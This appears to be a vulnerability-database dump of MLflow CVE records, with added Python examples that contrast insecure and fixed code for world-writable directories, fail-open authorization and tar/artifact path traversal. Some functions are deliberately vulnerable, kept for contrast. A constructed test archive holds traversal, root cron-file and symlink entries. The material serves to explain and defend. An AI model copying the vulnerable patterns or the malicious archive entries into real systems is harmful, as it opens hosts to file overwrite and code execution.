fixed_packages
0
url pkg:pypi/mlflow@3.4.0rc0
purl pkg:pypi/mlflow@3.4.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-4jya-uh8s-4ycv
4
vulnerability VCID-7ykf-b93e-w7am
5
vulnerability VCID-96az-gdtg-aka8
6
vulnerability VCID-9mak-nkua-3uhr
7
vulnerability VCID-axte-ftrh-4bb7
8
vulnerability VCID-fxtg-yezw-hfhr
9
vulnerability VCID-kqsy-qu8j-8ugj
10
vulnerability VCID-scm3-63j1-tkf2
11
vulnerability VCID-tnps-h89q-a7hj
12
vulnerability VCID-wphf-gk61-8ube
13
vulnerability VCID-xdur-8vs8-jfcy
14
vulnerability VCID-xjux-g847-hyb8
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.4.0rc0
aliases CVE-2025-10279, GHSA-4x5p-f36r-mxxr
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-w5et-zcp1-zfdb
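For the world-writable virtual environment directory above (CVE-2025-10279), the following added example contrasts the 0o777 pattern with an atomic `mkdtemp()` and adds the audit check a host owner would run. It is not MLflow's code; the directory names and the `demo()` layout are constructed.

```python
import os
import shutil
import stat
import tempfile

# Added illustration of the CVE-2025-10279 bug class; the functions are
# hypothetical stand-ins, not MLflow's code.


def vulnerable_make_env_dir(parent):
    """Pre-fix pattern: a directory under a shared tmp parent is chmod'ed to
    0o777. Every local user can then create or replace the .py files the
    environment is about to import. The sticky bit on /tmp does not help,
    because it only protects entries directly inside /tmp itself."""
    path = os.path.join(parent, "mlflow-venv")
    os.makedirs(path, exist_ok=True)
    os.chmod(path, 0o777)
    return path


def safe_make_env_dir(parent):
    """mkdtemp() creates the directory atomically with mode 0o700 and an
    unpredictable name, which closes both the overwrite race and the
    pre-creation (squatting) variant."""
    return tempfile.mkdtemp(prefix="mlflow-venv-", dir=parent)


def mode_of(path):
    return stat.S_IMODE(os.lstat(path).st_mode)


def is_world_writable(path):
    """World-writable without the sticky bit: anyone may delete or replace
    entries regardless of who owns them."""
    mode = os.lstat(path).st_mode
    return bool(mode & stat.S_IWOTH) and not bool(mode & stat.S_ISVTX)


def world_writable_dirs(root):
    """Audit helper: directories under root that any local user can tamper
    with. Symlinks are skipped so a link to /tmp is not reported."""
    found = []
    for dirpath, dirnames, _ in os.walk(root):
        for name in dirnames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path) and is_world_writable(path):
                found.append(path)
    return sorted(found)


def demo():
    """Create one directory each way under a fresh parent and return the paths."""
    root = tempfile.mkdtemp(prefix="mlflow-audit-")
    return root, vulnerable_make_env_dir(root), safe_make_env_dir(root)


def cleanup(root):
    shutil.rmtree(root, ignore_errors=True)
```

Pointing `world_writable_dirs()` at the tmp parent a serving host actually uses is a quick way to confirm an upgrade removed the weak directory rather than just renaming it.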
15
url VCID-wphf-gk61-8ube
vulnerability_id VCID-wphf-gk61-8ube
summary In the latest version of mlflow/mlflow, when the `basic-auth` app is enabled, tracing and assessment endpoints are not protected by permission validators. This allows any authenticated user, including those with `NO_PERMISSIONS` on the experiment, to read trace information and create assessments for traces they should not have access to. This vulnerability impacts confidentiality by exposing trace metadata and integrity by allowing unauthorized creation of assessments. Deployments using `mlflow server --app-name=basic-auth` are affected.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-15381.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-15381.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-15381
reference_id
reference_type
scores
0
value 0.00013
scoring_system epss
scoring_elements 0.022
published_at 2026-06-12T12:55:00Z
1
value 0.00013
scoring_system epss
scoring_elements 0.02208
published_at 2026-06-14T12:55:00Z
2
value 0.00013
scoring_system epss
scoring_elements 0.02195
published_at 2026-06-11T12:55:00Z
3
value 0.00013
scoring_system epss
scoring_elements 0.02199
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-15381
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://github.com/mlflow/mlflow/blob/b569ebc74c14af593c326143bee2df44a5d59edf/mlflow/server/auth/__init__.py#L752
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/blob/b569ebc74c14af593c326143bee2df44a5d59edf/mlflow/server/auth/__init__.py#L752
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-15381
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-15381
5
reference_url https://huntr.com/bounties/149fb2f9-ef4b-4136-a25c-20563451904c
reference_id 149fb2f9-ef4b-4136-a25c-20563451904c
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-27T16:58:49Z/
url https://huntr.com/bounties/149fb2f9-ef4b-4136-a25c-20563451904c
6
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2452341
reference_id 2452341
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2452341
7
reference_url https://github.com/advisories/GHSA-g6pg-52vf-843h
reference_id GHSA-g6pg-52vf-843h
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-g6pg-52vf-843h
fixed_packages
0
url pkg:pypi/mlflow@3.9.0rc0
purl pkg:pypi/mlflow@3.9.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-96az-gdtg-aka8
4
vulnerability VCID-axte-ftrh-4bb7
5
vulnerability VCID-fxtg-yezw-hfhr
6
vulnerability VCID-kqsy-qu8j-8ugj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.9.0rc0
aliases CVE-2025-15381, GHSA-g6pg-52vf-843h
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wphf-gk61-8ube
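The basic-auth entry above (CVE-2025-15381) is a fail-open authorization gap: routes with no validator registered were served without a permission check. The block below is an added illustration, not MLflow's code. Users, route paths and the validator table are constructed; only the permission names follow the basic-auth vocabulary.

```python
# Added illustration of the CVE-2025-15381 bug class. The routes, users and
# validator table are constructed; the permission names (NO_PERMISSIONS,
# READ, EDIT, MANAGE) follow MLflow's basic-auth vocabulary.

# Permission each user holds on the single experiment in this toy server.
PERMISSIONS = {"alice": "MANAGE", "mallory": "NO_PERMISSIONS"}


def can_read(user, experiment_id):
    return PERMISSIONS.get(user) in {"READ", "EDIT", "MANAGE"}


def can_update(user, experiment_id):
    return PERMISSIONS.get(user) in {"EDIT", "MANAGE"}


# Validator table keyed by (method, path). The bug class: a new endpoint
# family (traces, assessments) is added to the server without entries here.
VALIDATORS = {
    ("GET", "/api/2.0/mlflow/experiments/get"): can_read,
    ("POST", "/api/2.0/mlflow/runs/create"): can_update,
}

# Hypothetical paths standing in for the unprotected family.
TRACE_ROUTES = [
    ("GET", "/api/2.0/mlflow/traces/get"),
    ("POST", "/api/2.0/mlflow/traces/assessments/create"),
]
ALL_ROUTES = list(VALIDATORS) + TRACE_ROUTES


def authorize(user, method, path, experiment_id, validators=VALIDATORS, fail_closed=True):
    """Gatekeeper run before every request. With fail_closed=False a route
    missing from the table is let through, which is the reported behaviour;
    with fail_closed=True it is denied until a validator is registered."""
    validator = validators.get((method, path))
    if validator is None:
        return not fail_closed
    return validator(user, experiment_id)


def unguarded_routes(routes, validators=VALIDATORS):
    """Regression check for CI: every registered route must have a validator."""
    return [route for route in routes if route not in validators]
```

In a real deployment the validator for a trace endpoint also has to map the trace back to its experiment before checking the caller's permission; a default-deny gate like `fail_closed=True` is what keeps a forgotten mapping from silently becoming an information leak.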
16
url VCID-xdur-8vs8-jfcy
vulnerability_id VCID-xdur-8vs8-jfcy
summary A vulnerability in MLflow's pyfunc extraction process allows for arbitrary file writes due to improper handling of tar archive entries. Specifically, the use of `tarfile.extractall` without path validation enables crafted tar.gz files containing `..` or absolute paths to escape the intended extraction directory. This issue affects the latest version of MLflow and poses a high/critical risk in scenarios involving multi-tenant environments or ingestion of untrusted artifacts, as it can lead to arbitrary file overwrites and potential remote code execution.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-15031.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-15031.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-15031
reference_id
reference_type
scores
0
value 0.00333
scoring_system epss
scoring_elements 0.56673
published_at 2026-06-14T12:55:00Z
1
value 0.00333
scoring_system epss
scoring_elements 0.56549
published_at 2026-06-11T12:55:00Z
2
value 0.00333
scoring_system epss
scoring_elements 0.56684
published_at 2026-06-13T12:55:00Z
3
value 0.00333
scoring_system epss
scoring_elements 0.56669
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-15031
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://github.com/mlflow/mlflow/blob/fe4d9be330426904283401f1d2ed914238b6fc37/mlflow/pyfunc/dbconnect_artifact_cache.py#L140
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/blob/fe4d9be330426904283401f1d2ed914238b6fc37/mlflow/pyfunc/dbconnect_artifact_cache.py#L140
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-15031
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-15031
5
reference_url https://huntr.com/bounties/09856f77-f968-446f-a930-657d126efe4e
reference_id 09856f77-f968-446f-a930-657d126efe4e
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-19T13:52:23Z/
url https://huntr.com/bounties/09856f77-f968-446f-a930-657d126efe4e
6
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2448912
reference_id 2448912
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2448912
7
reference_url https://github.com/advisories/GHSA-fhff-qmm8-h2fp
reference_id GHSA-fhff-qmm8-h2fp
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fhff-qmm8-h2fp
fixed_packages
0
url pkg:pypi/mlflow@3.9.0rc0
purl pkg:pypi/mlflow@3.9.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-96az-gdtg-aka8
4
vulnerability VCID-axte-ftrh-4bb7
5
vulnerability VCID-fxtg-yezw-hfhr
6
vulnerability VCID-kqsy-qu8j-8ugj
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.9.0rc0
aliases CVE-2025-15031, GHSA-fhff-qmm8-h2fp
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xdur-8vs8-jfcy
17
url VCID-xjux-g847-hyb8
vulnerability_id VCID-xjux-g847-hyb8
summary
MLflow Tracking Server Artifact Handler Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of MLflow Tracking Server. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the handling of artifact file paths. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-26649.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-2033.json
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-2033.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-2033
reference_id
reference_type
scores
0
value 0.1444
scoring_system epss
scoring_elements 0.94611
published_at 2026-06-14T12:55:00Z
1
value 0.18428
scoring_system epss
scoring_elements 0.95386
published_at 2026-06-11T12:55:00Z
2
value 0.18428
scoring_system epss
scoring_elements 0.95405
published_at 2026-06-13T12:55:00Z
3
value 0.18428
scoring_system epss
scoring_elements 0.954
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-2033
2
reference_url https://github.com/mlflow/mlflow
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow
3
reference_url https://github.com/mlflow/mlflow/commit/5bf2ec2bd4222a18d78631183ac7f6b752afe8a4
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/commit/5bf2ec2bd4222a18d78631183ac7f6b752afe8a4
4
reference_url https://github.com/mlflow/mlflow/releases/tag/v3.8.0rc0
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/mlflow/mlflow/releases/tag/v3.8.0rc0
5
reference_url https://www.zerodayinitiative.com/advisories/ZDI-26-105
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.zerodayinitiative.com/advisories/ZDI-26-105
6
reference_url https://github.com/mlflow/mlflow/pull/19260
reference_id 19260
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-25T04:55:54Z/
url https://github.com/mlflow/mlflow/pull/19260
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2441508
reference_id 2441508
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2441508
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-2033
reference_id CVE-2026-2033
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-2033
9
reference_url https://github.com/advisories/GHSA-q2r8-vmq7-fpx2
reference_id GHSA-q2r8-vmq7-fpx2
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-q2r8-vmq7-fpx2
10
reference_url https://www.zerodayinitiative.com/advisories/ZDI-26-105/
reference_id ZDI-26-105
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-25T04:55:54Z/
url https://www.zerodayinitiative.com/advisories/ZDI-26-105/
fixed_packages
0
url pkg:pypi/mlflow@3.8.0rc0
purl pkg:pypi/mlflow@3.8.0rc0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1bya-32tr-jfhz
1
vulnerability VCID-24ct-fu3q-gbgj
2
vulnerability VCID-4jqc-vp49-2ybf
3
vulnerability VCID-96az-gdtg-aka8
4
vulnerability VCID-9mak-nkua-3uhr
5
vulnerability VCID-axte-ftrh-4bb7
6
vulnerability VCID-fxtg-yezw-hfhr
7
vulnerability VCID-kqsy-qu8j-8ugj
8
vulnerability VCID-scm3-63j1-tkf2
9
vulnerability VCID-wphf-gk61-8ube
10
vulnerability VCID-xdur-8vs8-jfcy
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@3.8.0rc0
aliases CVE-2026-2033, GHSA-q2r8-vmq7-fpx2
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xjux-g847-hyb8
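The tar-extraction entry (CVE-2025-15031, entry 16) and the artifact-path entry above (CVE-2026-2033) are both path-containment failures, so one added example covers them: a member check for archives, a manual extractor that honours no archive metadata, and the server-side check for a client-supplied artifact path. None of it is MLflow's code; the helpers are hypothetical and the archives are constructed in memory.

```python
import io
import os
import tarfile
import tempfile

# Added illustration of the traversal class behind CVE-2025-15031 (tar
# extraction) and CVE-2026-2033 (artifact file paths). Helpers are
# hypothetical, not MLflow's code; the archives are constructed in memory.


def _is_within(base, target):
    """True if target resolves to base or somewhere beneath it."""
    base = os.path.realpath(base)
    target = os.path.realpath(target)
    return target == base or target.startswith(base + os.sep)


def extract_vulnerable(tar_bytes, dest):
    """The pattern behind CVE-2025-15031: member names are trusted. Shown for
    contrast only; nothing below calls it."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        tar.extractall(dest)


def member_problem(member, dest):
    """Return why a tar member must not be extracted into dest, or None."""
    if os.path.isabs(member.name):
        return "absolute path"
    if not _is_within(dest, os.path.join(dest, member.name)):
        return "escapes destination"
    if member.issym() or member.islnk():
        return "link entry"        # a link could redirect a later write outside dest
    if not (member.isfile() or member.isdir()):
        return "special entry"     # devices, fifos
    return None


def unsafe_members(tar_bytes, dest):
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        return [m.name for m in tar.getmembers() if member_problem(m, dest)]


def extract_safe(tar_bytes, dest):
    """Validate every member first, then write regular files and directories
    by hand so no archive metadata (links, modes, owners) is honoured."""
    written = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        members = tar.getmembers()
        problems = [(m.name, p) for m in members if (p := member_problem(m, dest))]
        if problems:
            raise ValueError(f"refusing archive: {problems}")
        for m in members:
            target = os.path.join(dest, m.name)
            if m.isdir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with tar.extractfile(m) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.relpath(target, dest))
    return sorted(written)


def resolve_artifact_path(artifact_root, requested):
    """Server-side check for a client-supplied artifact path (the CVE-2026-2033
    class). Run it on the decoded path, after any URL or JSON decoding."""
    target = os.path.join(artifact_root, requested)
    if os.path.isabs(requested) or not _is_within(artifact_root, target):
        raise ValueError(f"artifact path escapes root: {requested!r}")
    return os.path.normpath(target)


def build_tar(entries):
    """Constructed test archives: bytes values become regular files, str
    values become symlinks pointing at that string."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, payload in entries.items():
            info = tarfile.TarInfo(name)
            if isinstance(payload, str):
                info.type = tarfile.SYMTYPE
                info.linkname = payload
                tar.addfile(info)
            else:
                info.size = len(payload)
                tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def make_dest():
    return tempfile.mkdtemp(prefix="mlflow-extract-")


def is_rejected(func, *args):
    try:
        func(*args)
    except ValueError:
        return True
    return False


BENIGN_TAR = build_tar({"model/MLmodel": b"flavors: {}\n", "model/requirements.txt": b"numpy\n"})
MALICIOUS_TAR = build_tar({"../evil.sh": b"id\n", "/etc/cron.d/x": b"* * * * * root id\n", "link": "/etc"})
```

On Python 3.12 and later `tarfile.extractall(path, filter="data")` applies comparable checks, but validating all members before writing any of them, as `extract_safe()` does, also avoids a half-extracted model on disk when a bad entry sits late in the archive. The artifact check must see the same string the file operation will use; a check on the raw URL misses `%2e%2e` that the framework decodes afterwards.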
Fixing_vulnerabilities
Risk_score 4.5
Resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/mlflow@2.22.1